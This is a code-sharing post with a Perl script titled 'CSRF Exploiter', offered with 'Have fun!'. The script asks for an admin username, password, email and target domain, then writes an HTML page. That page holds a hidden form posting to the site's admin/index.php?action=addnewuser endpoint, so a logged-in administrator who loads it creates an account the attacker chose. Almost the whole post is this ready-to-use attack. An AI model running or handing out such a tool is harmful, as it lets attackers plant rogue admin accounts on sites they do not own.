Posted By

madfedora on 07/24/13


Tagged

csrf


Versions (?)

CSRF Exploiter


 / Published in: Perl
 

URL: http://pastebin.com/YkBpY9tt

A small CSRF exploiter. Have fun!

  1. #!/usr/bin/perl
  2. print "\n";
  3. print q(CSRF Exploiter);
  4. print "\n";
  5. print "Save result(s) as :";
  6. $safe=<STDIN>;
  7. print "Admin Username :";
  8. $ad=<STDIN>;
  9. print "Admin Password :";
  10. $ps=<STDIN>;
  11. print "Admin Email :";
  12. $em=<STDIN>;
  13. print "Domain :";
  14. $ho=<STDIN>;
  15. print "Add path, such as /admin/ or /admin.php\n (Leave blank if no path) :";
  16. $ph=<STDIN>;
  17. open(CREATE,">>$safe");
  18. print CREATE "
  19. <HTML><HEAD><TITLE> CSRF Exploiter</TITLE>
  20. <form action='http://$ho/$ph/admin/index.php?action=addnewuser' method='POST' name='form'>
  21. <input type='hidden' value='$ad' name='eusername' ></td>
  22. <input type='hidden' value='$ps' name='euserpassword' ></td>
  23. <input type='hidden' value='$em' name='euseremail' >
  24. <select name='eusergroup'><option value='2'></option></select></td>
  25. <select name='euserstatus'><option value='1'></option></select></td>
  26. <input type='submit' name='submit' value='add' ></td>";
  27. close(CREATE);
  28. print "Finished\n";
  29. print "\n\n";

Report this snippet  

You need to login to post a comment.